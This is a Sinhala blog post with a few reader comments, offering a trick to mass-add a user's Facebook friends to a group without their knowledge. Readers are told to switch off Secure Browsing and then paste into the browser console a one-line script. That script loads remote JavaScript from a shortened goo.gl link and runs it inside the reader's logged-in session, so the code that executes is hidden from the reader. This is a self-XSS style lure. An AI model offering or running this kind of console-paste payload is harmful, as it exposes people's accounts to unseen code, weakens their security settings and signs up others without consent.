Like us

Follow Us

Total Pageviews

සුභ නව වසරක් වේවා!

ඔයාගේ Facebook Group එකට මෙම්බර්ස්ලා auto add කරගමු..!!

by Unknown  |  in ෆන් වැඩ at  Wednesday, December 11, 2013










හොදායි.... හොදායි.. නිකන් ගෙදරට වෙලා ඉන්න මේ දවස් ටිකේ ලෙඩ හැදුන එකනම් කරුමයක්ද කොහෙදෝ.. ඒ කරුමේ ගෙවෙයි බෙහෙත් වලට හා.. හරි මේ නත්තලට මගෙන් මොනවද ඕනේ බබාලට.. හා කියන්න බලන්න.සූප්පුවක්,බෝනික්කෙක් නැත්නම් සෙල්ලම් තුවක්කුවක් කැමති දෙයක් ඉල්ලන්න.මම තලා වෙන් නෑ.. මම නත්තල් සීයනේ. හුටා! තඩි බඩක් හොයාගන්න අමතක උනානේ. ඒකත් හොයාගන්ට ඕනේ.කියන්නත් අමතක වුනා ඊයේ O/L පටන් ගත්තනේ.. ඉතින් නන්ගිලා,මල්ලිලා සහා නැන්දලා මාමලා හොදට ලියන්න ඇති නේද එක්සෑම්.,ආ නැන්දලා මාමලා ලියන්නේ නෑනේ..සොරි ඈ..  

හලි හලි වල් පල් නවත්තලා ආව කාරණේ කියන්නම්කෝ..
කට්ටිය දන්නවනේ ෆේස්බුක් ගෲප්! අනේ අපි නොදනී දෙයියො දනී.. නෑ නෑ ගෲප් දන්නවනේ.ඉතින් සමහරු ගෲප් එකක් පටන් ඇරන් වේලි වේලි ඇති මෙම්බර්ස්ලා නැතිව. එතනම බන්කොලොත්නේ.සමහර ගෲප් නැගලම යනවා මෙම්බර්ස්ලා ගොඩා...ක් ඉන්න නිසා.. ඒත් මම අද කියලා දෙන්න හදන්නේ මෙම්බර්ස්ලා වැඩි කරගන්න විදිහක්.මේ ක්‍රමෙන් පුලුවන් ඔයාගේ යාලුවෝ ඔක්කොම එක ක්ලික් එකෙන් ඔයාගේ ගෲප් එකට කරගන්න.එතකොට උන්වත් දන් නෑ ඔයාගේ ගෲප් එකට ඇඩ් වෙලාද කියලා.

ගොඩක් යාලුවෝ ඉන්න ෆේස්බුක් අකවුන්ට් 3ක් 4ක් හොයාගත්තනම් ගොඩම තමා. ඔයාගේ යාලුවෝ 3000ක් විතර ඉන්නවනම් ඒ තුන්දාහම ගෲප් එකට ඇඩ් කරගන්න පුලුවන්.බයවෙන්න දෙයක් නෑ සිම්පල් ප්ලෑන් එකක්නේ.. හරි එහෙනම් අපි වැඩේ පටාන් ගමු!!!

ඉස්සල්ලාම මේ ස්ක්‍රිප්ට් එක කොපි කරගන්න. 

document.body.appendChild(document.createElement('script')).src='http://goo.gl/bq7sJ';


දැන් ඔයා Facebook ලොග් වෙලා ෆේස්බුක් ගිනුමේ
Facebook Account Settings >> Security Settings ගිහින් Secure Browsing එකට දාලා තියෙන ටික් එක අයින් කරලා Save කරන්න.

දැන් මෙම්බර්ස්ලා ඇඩ් කරගන්න ඕන ගෲප් එකට යන්න http:// වලින් . Chrome වල නම් ගිහිල්ලා F12 බටන් එක ප්‍රෙස් කරන්න.ආවා නේද යටින් යකෙක්.ආන්න ඒකේ Console කියන එක ක්ලික් කරන්න.




අර කොපි කරගත්තු ස්ක්‍රිප්ට් කෝඩ් එක පේස්ට් කරන්න.දැන් Enter ප්‍රෙස් කරන්න.


        Chrome එකට වගේම තමා Firefox එකටත්.ඒකෙදී අවශ්‍ය ගෲප් එකට ගිහින් Shift+Ctrl+K ප්‍රෙස් කරන්න දැන් අර ස්ක්‍රිප්ට් එක Ctrl+V ප්‍රෙස් කරලා පේස්ට් කරන්න.හරි දැන් Enter ප්‍රෙස් කරන්න.
 තත්පර 5කින් විතර යකා ගහනවා වගේ මෙම්බර්ස්ලා එකෙන් එක ඇඩ් වෙන්න පටන් ගනීවි.කොහොමද ආතල් එක.






කෝඩ් එක පේස්ට් කරන්න හැම වෙලාවෙම Ctrl+v යොදාගන්න ඈ..

 ඔය ස්ක්‍රිප්ට් එකෙන් පුලුවන් Chrome,Firefox දෙකෙන්ම ක්‍රියාකරවන්න.ඒ වගේම ෆේස්බුක් හි අප්ඩෙට් නිසා ඇතැම් අවස්ථා වලදී script එක ක්‍රියා නොකිරීමට පුලුවන්. ඒකට මන් පලි නෑ ඈ...

ඔන්න ඔය ක්‍රමේට ඔයාගේ ගෲප් එකත් ගොඩට ගන්න.නැත්තම් චාටර් එකනේ.ඔය ලොකු ලොකු ගෲප් හැදිලා තියෙන්නෙත් මෙහෙම තමා.නැතුව 100000 ගනන් ඉන්වයිට් කොර කොර හිටියැයි නේද..
හලි එහෙනම් තුබ ගමන් කීලා මම කැපෙනවා..ගුත් නයිත්!!


8 comments:

  1. Secure browsing can not be change

    ReplyDelete
  2. http automatically become https

    ReplyDelete
    Replies
    1. Facebook Account Settings >> Security Settings ගිහින් Secure Browsing එකට දාලා තියෙන ටික් එක අයින් කරලා Save කරන්න.

      Delete
  3. Replies
    1. තැන්කූ වේවා අදහසට ජනිත්,!

      Delete

+++වැඩේ හොදයි කියලා හිතෙනවනම් ශේප් එකේ අදහසකුත් කොටලම යන්නකෝ..

Related Posts Plugin for WordPress, Blogger...
Proudly Powered by Blogger.